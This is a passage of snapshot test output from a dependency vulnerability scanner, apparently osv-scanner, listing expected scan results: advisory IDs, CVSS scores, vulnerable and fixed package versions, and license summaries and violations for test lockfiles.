2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gww7-p5w4-wrfv | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h3cw-g4mq-c5x2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.6 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h592-38cm-4ggp | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-h822-r4r5-v8jg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-jjjh-jjxp-wpff | 7.5 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | 
testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-m6x4-97wx-4q27 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mph4-vhrx-mv67 | 5.9 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-mx7p-6679-8g3q | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.3 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-p43x-xfjf-5jhr | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-q93h-jc49-78gg | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.7 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qjw2-hr98-qgfh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qr7j-h6gg-jmgc | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r3gr-cxrf-hg25 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-r695-7vr9-jgc2 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rfx6-vp9g-rh7v | 9.8 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.2 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rgv9-q543-rqg4 | 8.2 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.12.7.1 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-rpr3-cw39-3pxh | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.4 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-v585-23hc-c647 | 8.1 | 
Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-vfqx-33qm-g869 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.6.7.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-w3f4-3q6j-rh82 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.7.9.5 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wh8g-3j2c-rqj5 | 8.1 | Maven | com.fasterxml.jackson.core:jackson-databind | 2.6.7.1 | 2.9.10.8 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j288-q9x7-2f5v | 6.5 | Maven | org.apache.commons:commons-lang3 | 3.12.0 | 3.18.0 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-7r82-7xv7-xcpj | 5.3 | Maven | org.apache.httpcomponents:httpclient | 4.5.5 | 4.5.13 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-cj7v-27pg-wf7q | 2.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.47 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-hmr7-m48g-48f6 | 5.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qh8g-58pp-2wxh | 6.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.12 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wjpw-4j6x-6rwh | 3.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.31 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-3gh6-v5v9-6v9j | 3.5 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwcr-j4wh-j3cq | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.41 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j26w-f9rq-mr2q | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.54 | testdata/artifact/javareach_test.jar | | 
https://osv.dev/GHSA-264p-99wq-f4j6 | 7.5 | Maven | software.amazon.ion:ion-java | 1.0.2 | -- | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ --- [TestCommand_JavareachArchive/jars_can_be_scanned_without_call_analysis - 2] --- [TestCommand_Licenses/Licenses_in_summary_mode_json - 1] { "results": [], "experimental_config": { "licenses": { "summary": true, "allowlist": [] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Licenses_in_summary_mode_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/Licenses_with_expressions - 1] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. overriding license for package npm/babel/6.23.0 with MIT AND (LGPL-2.1-or-later OR BSD-3-Clause) overriding license for package npm/human-signals/5.0.0 with LGPL-2.1-only OR MIT OR BSD-3-Clause overriding license for package npm/ms/2.1.3 with MIT WITH Bison-exception-2.2 Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------------+-------------------------+ | LICENSE | NO. 
OF PACKAGE VERSIONS | +---------------------------------------------+-------------------------+ | CC0-1.0 OR MIT | 1 | | LGPL-2.1-only OR MIT OR BSD-3-Clause | 1 | | MIT AND (LGPL-2.1-or-later OR BSD-3-Clause) | 1 | | MIT WITH Bison-exception-2.2 | 1 | +---------------------------------------------+-------------------------+ +------------------------------+-----------+---------+---------+-------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +------------------------------+-----------+---------+---------+-------------------------------------------+ | MIT WITH Bison-exception-2.2 | npm | ms | 2.1.3 | testdata/locks-licenses/package-lock.json | +------------------------------+-----------+---------+---------+-------------------------------------------+ --- [TestCommand_Licenses/Licenses_with_expressions - 2] --- [TestCommand_Licenses/Licenses_with_invalid_expression_in_config - 1] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. overriding license for package npm/babel/6.23.0 with MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)) overriding license for package npm/human-signals/5.0.0 with LGPL-2.1-only OR OR BSD-3-Clause overriding license for package npm/ms/2.1.3 with MIT WITH (Bison-exception-2.2 AND somethingelse) Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------------------------+-------------------------+ | LICENSE | NO. 
OF PACKAGE VERSIONS | +--------------------------------------------------+-------------------------+ | CC0-1.0 OR MIT | 1 | | LGPL-2.1-only OR OR BSD-3-Clause | 1 | | MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)) | 1 | | MIT WITH (Bison-exception-2.2 AND somethingelse) | 1 | +--------------------------------------------------+-------------------------+ +--------------------------------------------------+-----------+---------------+---------+-------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +--------------------------------------------------+-----------+---------------+---------+-------------------------------------------+ | LGPL-2.1-only OR OR BSD-3-Clause | npm | human-signals | 5.0.0 | testdata/locks-licenses/package-lock.json | | MIT WITH (Bison-exception-2.2 AND somethingelse) | npm | ms | 2.1.3 | testdata/locks-licenses/package-lock.json | +--------------------------------------------------+-----------+---------------+---------+-------------------------------------------+ --- [TestCommand_Licenses/Licenses_with_invalid_expression_in_config - 2] license LGPL-2.1-only OR OR BSD-3-Clause for package npm/human-signals/5.0.0 is invalid: unexpected OR after OR license MIT WITH (Bison-exception-2.2 AND somethingelse) for package npm/ms/2.1.3 is invalid: unexpected ( after WITH --- [TestCommand_Licenses/Licenses_with_invalid_licenses_in_flag - 1] --- [TestCommand_Licenses/Licenses_with_invalid_licenses_in_flag - 2] --licenses requires comma-separated spdx licenses. 
The following license(s) are not recognized as spdx: something-something --- [TestCommand_Licenses/No_license_violations_and_show-all-packages_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "babel", "version": "6.23.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] }, { "package": { "name": "ms", "version": "2.1.3", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "type-fest", "version": "4.26.1", "ecosystem": "npm" }, "licenses": [ "CC0-1.0 OR MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [ "MIT", "Apache-2.0" ] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/No_license_violations_and_show-all-packages_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/No_vulnerabilities_but_license_violations_with_allowlist - 1] Scanning dir ./testdata/locks-many/yarn.lock Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------+-------------------------+ | LICENSE | NO. 
OF PACKAGE VERSIONS | +---------+-------------------------+ | MIT | 1 | +---------+-------------------------+ +-------------------+-----------+----------------+---------+-------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+----------------+---------+-------------------------------+ | MIT | npm | balanced-match | 1.0.2 | testdata/locks-many/yarn.lock | +-------------------+-----------+----------------+---------+-------------------------------+ --- [TestCommand_Licenses/No_vulnerabilities_but_license_violations_with_allowlist - 2] --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. +------------+-------------------------+ | LICENSE | NO. 
OF PACKAGE VERSIONS | +------------+-------------------------+ | MIT | 2 | | Apache-2.0 | 1 | | UNKNOWN | 1 | +------------+-------------------------+ --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary - 2] --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary_in_markdown - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. | License | No. 
of package versions | | --- | ---:| | MIT | 2 | | Apache-2.0 | 1 | | UNKNOWN | 1 | --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary_in_markdown - 2] --- [TestCommand_Licenses/Show_all_Packages_with_license_summary_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "babel", "version": "6.23.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] }, { "package": { "name": "ms", "version": "2.1.3", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "type-fest", "version": "4.26.1", "ecosystem": "npm" }, "licenses": [ "CC0-1.0 OR MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Show_all_Packages_with_license_summary_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand_Licenses/Some_packages_with_ignored_licenses - 1] Scanning dir ./testdata/locks-many Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package npm/has-flag/4.0.0 has been filtered out because: (no reason given) Package npm/wrappy/1.0.2 has been filtered out because: (no reason given) Package npm/ansi-html/0.0.8 has been filtered out because: (no reason given) Package npm/balanced-match/1.0.2 has been filtered out because: (no reason given) Filtered 4 ignored package/s from the scan. overriding license for package Packagist/league/flysystem/1.0.8 with 0BSD overriding license for package Packagist/sentry/sdk/2.0.4 with 0BSD Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. 
+-------------------------------------+------+-----------+------------------+---------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+---------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | +-------------------------------------+------+-----------+------------------+---------+---------------+---------------------------------------+ +---------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +---------+-------------------------+ | 0BSD | 2 | | MIT | 1 | | UNKNOWN | 2 | +---------+-------------------------+ +-------------------+-----------+------------------+---------+-------------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+------------------+---------+-------------------------------------------------+ | 0BSD | Packagist | league/flysystem | 1.0.8 | testdata/locks-insecure/composer.lock | | UNKNOWN | Go | stdlib | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | UNKNOWN | Go | toolchain | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | 0BSD | Packagist | sentry/sdk | 2.0.4 | testdata/locks-many/composer.lock | +-------------------+-----------+------------------+---------+-------------------------------------------------+ --- [TestCommand_Licenses/Some_packages_with_ignored_licenses - 2] --- [TestCommand_Licenses/Some_packages_with_license_violations_and_show-all-packages_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "babel", "version": "6.23.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "human-signals", 
"version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "ms", "version": "2.1.3", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "type-fest", "version": "4.26.1", "ecosystem": "npm" }, "licenses": [ "CC0-1.0 OR MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [ "MIT" ] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Some_packages_with_license_violations_and_show-all-packages_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/Some_packages_with_license_violations_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [ "MIT" ] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Some_packages_with_license_violations_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand_Licenses/Vulnerabilities_and_all_license_violations_allowlisted - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | Apache-2.0 | 1 | +------------+-------------------------+ --- [TestCommand_Licenses/Vulnerabilities_and_all_license_violations_allowlisted - 2] --- [TestCommand_Licenses/Vulnerabilities_and_license_summary - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 
1 vulnerability can be fixed. +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | Apache-2.0 | 1 | +------------+-------------------------+ --- [TestCommand_Licenses/Vulnerabilities_and_license_summary - 2] --- [TestCommand_Licenses/Vulnerabilities_and_license_violations_with_allowlist - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
+-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | Apache-2.0 | 1 | +------------+-------------------------+ +-------------------+-----------+-----------+---------+-----------------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+-----------+---------+-----------------------------------------------------+ | Apache-2.0 | npm | ansi-html | 0.0.1 | testdata/locks-many-with-insecure/package-lock.json | +-------------------+-----------+-----------+---------+-----------------------------------------------------+ --- [TestCommand_Licenses/Vulnerabilities_and_license_violations_with_allowlist - 2] --- [TestCommand_Licenses/When_offline_licenses_are_still_validated - 1] --- [TestCommand_Licenses/When_offline_licenses_are_still_validated - 2] --licenses requires comma-separated spdx licenses. 
The following license(s) are not recognized as spdx: something-something --- [TestCommand_Licenses/When_offline_licenses_cannot_be_checked - 1] --- [TestCommand_Licenses/When_offline_licenses_cannot_be_checked - 2] cannot retrieve licenses locally --- [TestCommand_Licenses/When_offline_licenses_summary_cannot_be_printed - 1] --- [TestCommand_Licenses/When_offline_licenses_summary_cannot_be_printed - 2] cannot retrieve licenses locally --- [TestCommand_LocalDatabases/.gitignored_files - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/.gitignored_files - 2] --- [TestCommand_LocalDatabases/.gitignored_files - 3] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/.gitignored_files - 4] --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 1] Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Filtered 1 local/unscannable package/s from the scan. 
Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Alpine local db from /osv-scanner/Alpine/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 6 packages affected by 10 known vulnerabilities (1 Critical, 3 High, 2 Medium, 3 Low, 1 Unknown) from 3 ecosystems. 6 vulnerabilities can be fixed. +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | https://osv.dev/DRUPAL-CORE-2025-005 | 2.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-83v7-c2cf-p9c2 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-006 | 5.9 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-m6vv-vcj8-w8m7 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-007 | 2.1 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-h89p-5896-f4q8 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-008 | 3.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-mhpg-hpj5-73r2 | | | | | | | | https://osv.dev/DRUPAL-CONTRIB-2025-083 | | Packagist | drupal/simple_sitemap | 4.2.1 | -- | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | | 
https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 2] --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 3] Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Filtered 1 local/unscannable package/s from the scan. Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Alpine local db from /osv-scanner/Alpine/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 6 packages affected by 10 known vulnerabilities (1 Critical, 3 High, 2 Medium, 3 Low, 1 Unknown) from 3 ecosystems. 6 vulnerabilities can be fixed. 
